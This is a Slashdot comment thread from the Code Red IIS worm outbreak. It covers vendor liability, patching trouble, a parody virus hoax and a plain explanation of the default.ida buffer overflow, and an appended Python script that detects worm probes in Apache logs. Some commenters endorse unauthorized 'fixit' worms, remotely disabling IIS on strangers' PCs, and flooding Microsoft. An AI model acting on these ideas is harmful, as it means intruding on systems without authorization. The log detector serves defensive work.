The US Navy is giving it a good try, though.
not in critical systems. (Score:2)
Re:Microsoft should be sued (Score:5, Insightful)
Re:Microsoft should be sued (Score:5, Insightful)
Claiming that Microsoft should be liable for sysadmins who are some combination of naive, out of touch, unqualified, or just plain stupid is like claiming that I can sue Honda because my parked car was sideswiped by an unlicensed, drunk driver who just happened to be in an Accord.
*: This also applies to NT 4.0.
Re:Microsoft should be sued (Score:2)
I also don't know what the details of how to install IIS on W2KPro are, but I bet it isn't that hard to do "accidentally" -- If nothing else, I can see people just checking everything "just in case" without realizing that that meant that it would run automatically on boot.
Re:Microsoft should be sued (Score:3, Informative)
Re:Microsoft should be sued (Score:2)
The only versions of 2000 that install IIS by default are all server variants. That target market damn well better know what they're getting. That won't include the average user. If they really want a web server, the sticker shock of 2000 Server will send them to Linux.
Re:Microsoft should be sued (Score:3, Insightful)
Certainly, applying the patch is a necessary thing - but when you look at it from a business perspective, which is worse:
1. Apply the patch, have our other server stuff stop working (say, our lovely ASP stuff), and lose money - but save the rest of the internet.
2. Don't apply the patch - we keep making money - and screw everybody else - we will wait.
Suddenly, it all makes sense...
Finally (Score:5, Funny)
Saddens me though (Score:5, Funny)
We seem to have a good ways to go before everything that runs on Winblows will also run on Linux
Re: (Score:2)
Re: (Score:2)
Re:Finally (Score:2, Funny)
Put it in another log and forget about it. (Score:4, Interesting)
I'm not even sure how to spell regexe, but this is what I've attempted to do:
Interesting Irony (Score:5, Funny)
Who's calling Whose code "Potentially Viral"?
Re:Bah. (Score:3, Insightful)
And the only thing I saw wrong in that report is that they believed the companies in question when they reported "isolated" problems that have already been fixed.
I've got entire projects sitting dead in the water because one server relies on one piece of third-party software that can't operate with Service Pack 6a, and so can't be brought up until they find a solution.
The pisser is none of MY servers were affected, but I'm still dead in the water because of a bunch of idiots on other teams and projects.
Comment removed (Score:5, Insightful)
Use this tool, you can install Service Pack MAXINT (Score:2)
Encourage the author (Naken) and you'll soon be able to bin VB screen apps as well. Woohoo!
Re:Bah. (Score:4, Informative)
You might be interested in this article [securityfocus.com]titled, "Securing an unpatchable webserver"
Re:Bah. (Score:2)
Whoops, make that 1094 on the first and 580 on the third -- got a couple more as I was entering this.
eEye's Scanner (Score:2)
http://www.eEye.com/Retina [eeye.com]
Legal the same way as ShareSniffer, perhaps? (Score:2)
Essentially, they say that since people enable drive sharing manually, an open share holds the same legality as a clickthrough license: You wouldn't have clicked it if you didn't want to do that, so you're responsible for what happens.
People don't install Windows by mistake. (well, that's another joke entirely) If they have services running that any reasonably competent admin would know about, they're responsible for those.
The point of a server is to let people use it. The point of an internet connection is to make your computer part of a global network. If you're running a server on the internet, you INTEND to have it accessed by anyone who wants to.
The worm's problem is that it's malicious, sucking up unreasonable amounts of bandwidth and denying service to others. If someone wrote a fixit worm that worked as advertised, I don't see how it could run afoul of the law. Just be careful with the bandwidth usage. Someone might call it unauthorized access, which is bullshit, access is implicitly authorized by the machine's very presence on the internet.
IANAL!
Re:Shutting off IIS on an comprimised box... (Score:2)
Most of the infections I've seen are on home PCs with cable modem, and the owner doesn't even know that IIS is active by default. I'd like to find a request that will switch IIS service from automatic to disabled. They'll never notice the difference, and the world will be a better place.
Re:Back Door? Somebody call the Goatse.cx guy! (Score:2, Funny)
Well, suppose we had this giant electronic speculum ;-)
Re:Not SYSTEM-level access.... (Score:2)
More info on Code Red III (Score:4, Funny)
If you see a message on the boards with a subject line of "Hi, how are you," delete it immediately WITHOUT reading it. It is "Code Red III". This is the most dangerous virus yet. It will re-write your hard drive. Not only that, but it will scramble any disks that are even close to your computer (up to 20 feet). It will recalibrate your refrigerator's coolness setting so all your ice cream melts and milk curdles. It will demagnetize the strips on all your credit cards, reprogram your ATM access code, screw up the tracking on your VCR and use subspace field harmonics to scratch any CDs you try to play.
It will give your ex-boy/girlfriend your new phone number. It will program your phone autodial to call only your mother's number. It is insidious and subtle. It is dangerous and terrifying to behold. It will mix antifreeze into your fish tank. It will drink all your beer. It will hide your car keys when you are late for work and interfere with your car radio so that you hear 1940's hits and static while stuck in traffic.
It will give you nightmares about circus midgets. It will replace your shampoo with Nair and your Nair with Rogaine, all while dating your current boy/girlfriend behind your back and billing their hotel rendezvous to your Visa card. It will seduce your grandmother. It does not matter if she is dead, such is the power of "Code Red III", it reaches out beyond the grave to sully those things we hold most dear.
It will rewrite your back-up files, changing all your active verbs to passive tense and incorporating undetectable misspellings which grossly change the interpretation of key sentences.
"Code Red III" will give you Dutch Elm disease. It will leave the toilet seat up and leave the hairdryer plugged in dangerously close to a full bathtub. It will wantonly remove the forbidden tags from your mattresses and pillows, and refill your skim milk with whole. "Code Red III" is an evil virus conceived by evil people. It is also a rather interesting shade of mauve. These are just a few signs. Be very, very afraid. PLEASE FORWARD THIS MESSAGE TO EVERYONE YOU KNOW!!!
Re:More info on Code Red III (Score:2, Insightful)
The guy does have a point (Score:2, Informative)
Re:Code Red is trying to eat me! (Score:3, Insightful)
As much as I hate Verizon and their bullshit, at least they are trying to do something.
Gotta give em SOME credit
Pretty devastating DoS attack in the making (Score:2)
Let's see just how many boxen we can get slamming MS at once...
Public Logfile - for *Educational* Purposes Only (Score:5, Informative)
I'm still wondering what I should do with the hundreds of IPs in my desktop's apache log
should we set up a site somewhere of ip addrs?
Already got one! [glowingplate.com] Remember, the list, including fully-qualified hostnames [glowingplate.com], is for _educational_ purposes only. I've made it available [glowingplate.com] so that we can study how this thing moves, not for such purposes as mass-spamming postmaster@$IIS-INFECTED-HOSTNAME with flames reminding him that he is a blithering idiot, nor for other untoward activities which may be performed on a machine with a shell in a webserver's public directory.
If the log hits aren't for you, do the right thing (Score:4, Funny)
It's just common courtesy, provided it isn't a competitor's site.
So what you do is set up a script to pull each individual Code Red transaction out of your logs and send an email to support@microsoft.com with a message similar to the following:
A user at IP address x.x.x.x was trying to contact you and got my IP address by mistake. I know how important the needs and desires of your customers are to Microsoft, so I was certain you would want to know about this as soon as possible.
Re:Code Red 'counter' (Score:2, Informative)
grep 'default.ida' access_log | mail -s 'APACHE' redalert@dshield.org
They use this information to notify the owners of the machines of the infection and to track the progression of the worm.
Re:CodeRed Information (Score:2)
Seems odd to me too since Code Red II (not CRv2) can't infect NT servers - it just crashes them when it tries to run due to a bogus jump table that only works with Win 2K.
From the Code Red II analysis: This worm, like the original Code Red worm, will only exploit Windows 2000 web servers because it overwrites EIP with a jmp that is only correct under Windows 2000. Under NT4.0 etc... that offset is different so, the process will simply crash instead of allowing the worm to infect the system and spread.
Re:Perhaps REAL Damage will Fix the Problem (Score:2)
It can't do this too quickly or it wouldn't get that many of them. Also people would just reformat and reinstall. "Evolution" doesn't work very well with "reincarnation"
Code Red Cannot Be Stopped (Score:2)
Re:Please (Score:4, Flamebait)
One problem.... (Score:3, Insightful)
RoadRunner is additionally trying to shut down individual cable modems, rather than some of the more extreme measures other providers are using (like killing port 80), so kudos to them. Please get the word out to anyone running 2K or NT to check their box, not just anyone who KNOWS they're running a website.
Re:Copycats (Score:5, Insightful)
The folks here at the Fortune 500 company I work for who have been working around the clock since Wednesday trying to clean up this mess will be real happy to hear that you don't believe it exists.
Thanks for the suggestion (Score:3, Funny)
OK, it will be ready in an hour, just got to build the array handler routine.
Re:Help me out on this one... (Score:5, Informative)
What happens is that IIS sits there, waiting for Web browsers to request pages. A Code Red infected server starts randomly picking other computers on the Internet or the network, and requests them to send a Web page called default.ida. It then passes a huge parameter to default.ida.
Apparently, default.ida has hard-coded a maximum length for parameters -- say, 200 letters. (Probably not actually 200 -- but you get the idea.) That's what all the XXX and NNN's are there for -- it's the 200 (etc.) letters that's the most default.ida is expecting to receive. A buffer overflow is when something goes past that maximum number of letters, and a program with a buffer overflow problem usually does something strange with the information past that point -- in this case, default.ida takes everything after that number of letters and runs it as if it were a program.
Normally, this would just crash IIS (since it's getting a bunch of garbage, and running garbage makes programs crash) but Code Red is purposely designed so after the right number (200 or whatever) of XXX/NNN's, it tacks on the code to infect the computer with Code Red. So, IIS runs the code, the computer becomes infected with Code Red, it starts trying to spread it to other computers, and the whole cycle starts all over again.
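The thread's one-liner (`grep 'default.ida' access_log | mail ...`) and the explanation above of the long XXX/NNN filler run both describe the same thing a defender sees in an Apache log. The following added example (not code from the original thread or from any of its posters) parses access-log lines, keeps only requests that really look like Code Red probes (a `/default.ida?` path followed by a long run of a single filler letter), records the filler letter per hit and counts probes per source IP. The log lines, the IP addresses, the `MIN_FILLER` threshold of 64 and the helper names are all constructed for this example; the real worm's filler run is longer, and the rest of its query string is deliberately omitted from the sample.

```python
"""Detect Code Red-style /default.ida probes in an Apache access log.

Added example, not code from the original thread. It does what the
thread does with `grep 'default.ida' access_log`, but parses each line
so the source IPs can be counted and the filler letter (the NNN... or
XXX... run the thread mentions) is recorded per hit.
"""
import re
from collections import Counter

# Apache common/combined log prefix: client IP, ident, user, timestamp,
# request line, status, size. Trailing referer/agent fields are ignored.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# A probe is /default.ida? followed by a long run of one filler letter.
# MIN_FILLER is an assumed, conservative threshold (the worm's run is a
# few hundred characters) so a short accidental query never matches.
MIN_FILLER = 64
PROBE_RE = re.compile(r'^/default\.ida\?(N{%d,}|X{%d,})' % (MIN_FILLER, MIN_FILLER))


def _probe(ip, ts, filler):
    # Constructed request: the filler run only; the remainder of the worm's
    # query string is intentionally left out of this sample.
    return f'{ip} - - [{ts}] "GET /default.ida?{filler * 80}=a HTTP/1.0" 404 282'


# Constructed sample log (not from the original page): three probes from two
# sources, one normal request, and one 404 whose path merely begins with
# "default.ida" and must not be counted.
SAMPLE_LOG = "\n".join([
    _probe("192.0.2.10", "04/Aug/2001:13:12:01 -0400", "N"),
    '198.51.100.7 - - [04/Aug/2001:13:12:03 -0400] "GET /index.html HTTP/1.1" 200 1043',
    _probe("203.0.113.44", "04/Aug/2001:13:12:09 -0400", "X"),
    _probe("192.0.2.10", "04/Aug/2001:13:14:41 -0400", "N"),
    '198.51.100.7 - - [04/Aug/2001:13:15:00 -0400] "GET /default.idaho.html HTTP/1.1" 404 210',
]) + "\n"


def parse_line(line):
    """Return the parsed fields of one access-log line, or None if malformed."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify(path):
    """Return the filler letter ("N" or "X") if the request path is a
    Code Red-style probe against /default.ida, otherwise None."""
    m = PROBE_RE.match(path)
    return m.group(1)[0] if m else None


def scan(log_text):
    """Return one record per probe found in the log text."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        variant = classify(rec["path"])
        if variant is None:
            continue
        hits.append({"ip": rec["ip"], "ts": rec["ts"], "variant": variant,
                     "status": int(rec["status"]), "raw": line})
    return hits


def summarize(hits):
    """Count probes per source IP: the list a defender would hand to the
    source's ISP or to an abuse tracker such as the one named in the thread."""
    return Counter(h["ip"] for h in hits)


def report_lines(log_text):
    """Raw lines to forward, like `grep 'default.ida' access_log`, but
    restricted to lines that parse as genuine probes."""
    return [h["raw"] for h in scan(log_text)]


if __name__ == "__main__":
    found = scan(SAMPLE_LOG)
    for ip, n in summarize(found).most_common():
        print(f"{ip:16} {n} probe(s)")
    print("\n".join(report_lines(SAMPLE_LOG)))
```

Requiring the long filler run, rather than matching the bare string `default.ida`, is what keeps a path like `/default.idaho.html` or a one-off typo out of the list you forward; the per-IP counter is the natural starting point for the "hundreds of IPs" question at the top of the page.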